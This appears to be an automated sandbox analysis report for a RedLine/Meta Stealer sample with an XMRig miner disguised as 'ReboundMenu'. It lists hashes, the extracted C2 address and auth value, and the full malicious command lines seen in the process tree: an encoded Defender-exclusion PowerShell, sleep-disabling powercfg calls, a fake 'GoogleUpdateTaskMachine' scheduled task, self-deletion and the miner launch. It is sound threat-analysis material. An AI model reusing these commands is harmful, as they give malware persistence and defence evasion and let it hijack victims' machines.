Analysis
-
max time kernel
151s -
max time network
138s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
15-04-2022 07:10
Static task
static1
Behavioral task
behavioral1
Sample
ReboundMenu_V4.15.3.exe
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
ReboundMenu_V4.15.3.exe
Resource
win10v2004-20220414-en
General
-
Target
ReboundMenu_V4.15.3.exe
-
Size
1.7MB
-
MD5
11bee17705209c6aa6789c93d3789eaa
-
SHA1
93098eab6c80fbd80d538385d1fafc5dd20500b2
-
SHA256
484525c831d15dfb80c4355a6995f331a15e3a3bdeea43746e5d4000a16b27e6
-
SHA512
b0bedfb38d641d0667dd14161f36bd3a16b80dbd54be9840cad88d04d97385334cd112176456f923b5e443d13b43227f5229a7ade644c1048ec704eb71de2fd2
Malware Config
Extracted
redline
185.186.142.127:6737
-
auth_value
69a1f5b6b455ba880252fbfe1168b351
Signatures
-
Meta Stealer Stealer
Meta Stealer steals passwords stored in browsers, written in C++.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 1 IoCs
resource yara_rule behavioral2/memory/1600-133-0x0000000000380000-0x00000000003A0000-memory.dmp family_redline -
XMRig Miner Payload 5 IoCs
resource yara_rule behavioral2/memory/3824-199-0x000000014036DAD4-mapping.dmp xmrig behavioral2/memory/3824-198-0x0000000140000000-0x0000000140803000-memory.dmp xmrig behavioral2/memory/3824-200-0x0000000140000000-0x0000000140803000-memory.dmp xmrig behavioral2/memory/3824-201-0x0000000140000000-0x0000000140803000-memory.dmp xmrig behavioral2/memory/3824-203-0x0000000140000000-0x0000000140803000-memory.dmp xmrig -
Downloads MZ/PE file
-
Executes dropped EXE 2 IoCs
pid Process 2616 fl.exe 1944 charme.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 2996 set thread context of 1600 2996 ReboundMenu_V4.15.3.exe 80 PID 3032 set thread context of 3812 3032 conhost.exe 108 PID 3032 set thread context of 3824 3032 conhost.exe 112 -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2884 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1600 AppLaunch.exe 4568 powershell.exe 4568 powershell.exe 408 conhost.exe 4468 powershell.exe 4468 powershell.exe 3032 conhost.exe 3824 explorer.exe 3824 explorer.exe 3824 explorer.exe 3824 explorer.exe 3824 explorer.exe 3824 explorer.exe 3824 explorer.exe 3824 explorer.exe 3824 explorer.exe 3824 explorer.exe 3824 explorer.exe 3824 explorer.exe 3824 explorer.exe 3824 explorer.exe 3824 explorer.exe 3824 explorer.exe 3824 explorer.exe 3824 explorer.exe 3824 explorer.exe 3824 explorer.exe 3824 explorer.exe 3824 explorer.exe 3824 explorer.exe 3824 explorer.exe 3824 explorer.exe 3824 explorer.exe 3824 explorer.exe 3824 explorer.exe 3824 explorer.exe 3824 explorer.exe 3824 explorer.exe 3824 explorer.exe 3824 explorer.exe 3824 explorer.exe 3824 explorer.exe 3824 explorer.exe 3824 explorer.exe 3824 explorer.exe 3824 explorer.exe 3824 explorer.exe 3824 explorer.exe 3824 explorer.exe 3824 explorer.exe 3824 explorer.exe 3824 explorer.exe 3824 explorer.exe 3824 explorer.exe 3824 explorer.exe 3824 explorer.exe 3824 explorer.exe 3824 explorer.exe 3824 explorer.exe 3824 explorer.exe 3824 explorer.exe 3824 explorer.exe 3824 explorer.exe 3824 explorer.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 648 Process not Found -
Suspicious use of AdjustPrivilegeToken 23 IoCs
description pid Process Token: SeDebugPrivilege 1600 AppLaunch.exe Token: SeDebugPrivilege 4568 powershell.exe Token: SeDebugPrivilege 408 conhost.exe Token: SeShutdownPrivilege 2636 powercfg.exe Token: SeCreatePagefilePrivilege 2636 powercfg.exe Token: SeShutdownPrivilege 4968 powercfg.exe Token: SeCreatePagefilePrivilege 4968 powercfg.exe Token: SeShutdownPrivilege 4224 powercfg.exe Token: SeCreatePagefilePrivilege 4224 powercfg.exe Token: SeShutdownPrivilege 3260 powercfg.exe Token: SeCreatePagefilePrivilege 3260 powercfg.exe Token: SeDebugPrivilege 4468 powershell.exe Token: SeDebugPrivilege 3032 conhost.exe Token: SeShutdownPrivilege 1040 powercfg.exe Token: SeCreatePagefilePrivilege 1040 powercfg.exe Token: SeShutdownPrivilege 4384 powercfg.exe Token: SeCreatePagefilePrivilege 4384 powercfg.exe Token: SeShutdownPrivilege 4452 powercfg.exe Token: SeCreatePagefilePrivilege 4452 powercfg.exe Token: SeShutdownPrivilege 1932 powercfg.exe Token: SeCreatePagefilePrivilege 1932 powercfg.exe Token: SeLockMemoryPrivilege 3824 explorer.exe Token: SeLockMemoryPrivilege 3824 explorer.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2996 wrote to memory of 1600 2996 ReboundMenu_V4.15.3.exe 80 PID 2996 wrote to memory of 1600 2996 ReboundMenu_V4.15.3.exe 80 PID 2996 wrote to memory of 1600 2996 ReboundMenu_V4.15.3.exe 80 PID 2996 wrote to memory of 1600 2996 ReboundMenu_V4.15.3.exe 80 PID 2996 wrote to memory of 1600 2996 ReboundMenu_V4.15.3.exe 80 PID 1600 wrote to memory of 2616 1600 AppLaunch.exe 81 PID 1600 wrote to memory of 2616 1600 AppLaunch.exe 81 PID 2616 wrote to memory of 408 2616 fl.exe 82 PID 2616 wrote to memory of 408 2616 fl.exe 82 PID 2616 wrote to memory of 408 2616 fl.exe 82 PID 408 wrote to memory of 4640 408 conhost.exe 83 PID 408 wrote to memory of 4640 408 conhost.exe 83 PID 4640 wrote to memory of 4568 4640 cmd.exe 85 PID 4640 wrote to memory of 4568 4640 cmd.exe 85 PID 408 wrote to memory of 5100 408 conhost.exe 86 PID 408 wrote to memory of 5100 408 conhost.exe 86 PID 5100 wrote to memory of 2636 5100 cmd.exe 88 PID 5100 wrote to memory of 2636 5100 cmd.exe 88 PID 5100 wrote to memory of 4968 5100 cmd.exe 89 PID 5100 wrote to memory of 4968 5100 cmd.exe 89 PID 5100 wrote to memory of 4224 5100 cmd.exe 90 PID 5100 wrote to memory of 4224 5100 cmd.exe 90 PID 5100 wrote to memory of 3260 5100 cmd.exe 91 PID 5100 wrote to memory of 3260 5100 cmd.exe 91 PID 408 wrote to memory of 5080 408 conhost.exe 92 PID 408 wrote to memory of 5080 408 conhost.exe 92 PID 5080 wrote to memory of 2884 5080 cmd.exe 94 PID 5080 wrote to memory of 2884 5080 cmd.exe 94 PID 408 wrote to memory of 5096 408 conhost.exe 95 PID 408 wrote to memory of 5096 408 conhost.exe 95 PID 408 wrote to memory of 4044 408 conhost.exe 97 PID 408 wrote to memory of 4044 408 conhost.exe 97 PID 4044 wrote to memory of 4164 4044 cmd.exe 99 PID 4044 wrote to memory of 4164 4044 cmd.exe 99 PID 5096 wrote to memory of 1944 5096 cmd.exe 100 PID 5096 wrote to memory of 1944 5096 cmd.exe 100 PID 1944 wrote to memory of 3032 1944 charme.exe 101 PID 1944 wrote to memory of 3032 1944 charme.exe 101 PID 1944 wrote to memory of 3032 1944 charme.exe 101 PID 3032 wrote to memory of 5024 3032 conhost.exe 102 PID 3032 wrote to memory of 5024 3032 conhost.exe 102 PID 5024 wrote to memory of 4468 5024 cmd.exe 104 PID 5024 wrote to memory of 4468 5024 cmd.exe 104 PID 3032 wrote to memory of 3840 3032 conhost.exe 105 PID 3032 wrote to memory of 3840 3032 conhost.exe 105 PID 3840 wrote to memory of 1040 3840 cmd.exe 107 PID 3840 wrote to memory of 1040 3840 cmd.exe 107 PID 3032 wrote to memory of 3812 3032 conhost.exe 108 PID 3032 wrote to memory of 3812 3032 conhost.exe 108 PID 3032 wrote to memory of 3812 3032 conhost.exe 108 PID 3032 wrote to memory of 3812 3032 conhost.exe 108 PID 3032 wrote to memory of 3812 3032 conhost.exe 108 PID 3032 wrote to memory of 3812 3032 conhost.exe 108 PID 3032 wrote to memory of 3812 3032 conhost.exe 108 PID 3032 wrote to memory of 3812 3032 conhost.exe 108 PID 3032 wrote to memory of 3812 3032 conhost.exe 108 PID 3840 wrote to memory of 4384 3840 cmd.exe 109 PID 3840 wrote to memory of 4384 3840 cmd.exe 109 PID 3840 wrote to memory of 4452 3840 cmd.exe 110 PID 3840 wrote to memory of 4452 3840 cmd.exe 110 PID 3840 wrote to memory of 1932 3840 cmd.exe 111 PID 3840 wrote to memory of 1932 3840 cmd.exe 111 PID 3032 wrote to memory of 3824 3032 conhost.exe 112 PID 3032 wrote to memory of 3824 3032 conhost.exe 112
Processes
-
C:\Users\Admin\AppData\Local\Temp\ReboundMenu_V4.15.3.exe"C:\Users\Admin\AppData\Local\Temp\ReboundMenu_V4.15.3.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2996 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1600 -
C:\Users\Admin\AppData\Local\Temp\fl.exe"C:\Users\Admin\AppData\Local\Temp\fl.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2616 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\fl.exe"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:408 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGIAdQBxACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZABlACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGYAcgAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB4AHkAIwA+AA=="5⤵
- Suspicious use of WriteProcessMemory
PID:4640 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "PAAjAGIAdQBxACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZABlACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGYAcgAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB4AHkAIwA+AA=="6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4568
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 05⤵
- Suspicious use of WriteProcessMemory
PID:5100 -
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 06⤵
- Suspicious use of AdjustPrivilegeToken
PID:2636
-
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 06⤵
- Suspicious use of AdjustPrivilegeToken
PID:4968
-
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 06⤵
- Suspicious use of AdjustPrivilegeToken
PID:4224
-
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 06⤵
- Suspicious use of AdjustPrivilegeToken
PID:3260
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachine" /tr "C:\Users\Admin\AppData\Roaming\charme.exe"5⤵
- Suspicious use of WriteProcessMemory
PID:5080 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachine" /tr "C:\Users\Admin\AppData\Roaming\charme.exe"6⤵
- Creates scheduled task(s)
PID:2884
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c "C:\Users\Admin\AppData\Roaming\charme.exe"5⤵
- Suspicious use of WriteProcessMemory
PID:5096 -
C:\Users\Admin\AppData\Roaming\charme.exeC:\Users\Admin\AppData\Roaming\charme.exe6⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1944 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\charme.exe"7⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3032 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGIAdQBxACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZABlACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGYAcgAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB4AHkAIwA+AA=="8⤵
- Suspicious use of WriteProcessMemory
PID:5024 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "PAAjAGIAdQBxACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZABlACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGYAcgAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB4AHkAIwA+AA=="9⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4468
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 08⤵
- Suspicious use of WriteProcessMemory
PID:3840 -
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 09⤵
- Suspicious use of AdjustPrivilegeToken
PID:1040
-
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 09⤵
- Suspicious use of AdjustPrivilegeToken
PID:4384
-
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 09⤵
- Suspicious use of AdjustPrivilegeToken
PID:4452
-
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 09⤵
- Suspicious use of AdjustPrivilegeToken
PID:1932
-
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe8⤵PID:3812
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "vtowhpjpnxwsrik"9⤵PID:2168
-
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe aumdnvyddh1 Xji3FXYfqqI2timPThbgZueMNpSES88mLhMz2ywydJS6kTcb2sZJ49Q3iSMDc1H0o0uNnhRclY6DcoQfJIkPc5ubji/PYICTS6YCivJp16OXyHB+WvLzMf4KQTl36jWiAqpPFFwujek1VkP9II8fKxesKjZLxzwmF/WZ/I0WqoFl0CEzXLG/No5YgMHiLom87fH1KSo63FDBNUmQTm7iowsSG1tGhG8IaKfn4rIMLuc7r5qhutURjZI+9zW3DqmPoFP+3nbkrxLDRxtRUmBHDH81T8M7FlEgSc+nu8grKK292smbuRhMgyC/0SqFZGS+/LDXdJhFimn5YqYVKsb9TjZV1tR8NqBhbVh1eRLowkab/dPtfJ0IiWdptcw7y0THB2KUFt7gaTNiYsAxIllIrSD9XeH8ilKRC1AuYRpU7G6PE1ZlfQNPkEnQ5T8ZDbZ/8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3824
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\fl.exe"5⤵
- Suspicious use of WriteProcessMemory
PID:4044 -
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 36⤵PID:4164
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
443B
MD58add56521ef894ef0c66ecd3e989d718
SHA12058aa5185fd5dcce7263bef8fe35bf5e12dbc7f
SHA25601bcb6c8348b83208a7c923fd840130a0bc7b3a188b62ad8e270a296ed94b724
SHA512af99971664282617c18db6a27ddb3bf57eaa291d79ef66828319de3eb38533cc813f7d322cc4c9e687aa90b5c91b7874ed8e725c3cfe35e139e0581492caefb2
-
Filesize
944B
MD56d42b6da621e8df5674e26b799c8e2aa
SHA1ab3ce1327ea1eeedb987ec823d5e0cb146bafa48
SHA2565ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c
SHA51253faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29
-
Filesize
4.1MB
MD5798fa001d694999cda269d3af437dbbc
SHA122598970ba604e9b03475af8a7cab96408fb6547
SHA2565270d7b5223813844514fb7cec6afa889d365aee01ea4307be094cd1b4bbbe46
SHA5128e69521c43235d308be0a20bd67e867ee3cd1fe3ad335dc83586a5af169e50addff8f04d70ae95680739582459c88909f12623897de0e2827d0d6ff488ffadf7
-
Filesize
4.1MB
MD5798fa001d694999cda269d3af437dbbc
SHA122598970ba604e9b03475af8a7cab96408fb6547
SHA2565270d7b5223813844514fb7cec6afa889d365aee01ea4307be094cd1b4bbbe46
SHA5128e69521c43235d308be0a20bd67e867ee3cd1fe3ad335dc83586a5af169e50addff8f04d70ae95680739582459c88909f12623897de0e2827d0d6ff488ffadf7
-
Filesize
4.1MB
MD5798fa001d694999cda269d3af437dbbc
SHA122598970ba604e9b03475af8a7cab96408fb6547
SHA2565270d7b5223813844514fb7cec6afa889d365aee01ea4307be094cd1b4bbbe46
SHA5128e69521c43235d308be0a20bd67e867ee3cd1fe3ad335dc83586a5af169e50addff8f04d70ae95680739582459c88909f12623897de0e2827d0d6ff488ffadf7
-
Filesize
4.1MB
MD5798fa001d694999cda269d3af437dbbc
SHA122598970ba604e9b03475af8a7cab96408fb6547
SHA2565270d7b5223813844514fb7cec6afa889d365aee01ea4307be094cd1b4bbbe46
SHA5128e69521c43235d308be0a20bd67e867ee3cd1fe3ad335dc83586a5af169e50addff8f04d70ae95680739582459c88909f12623897de0e2827d0d6ff488ffadf7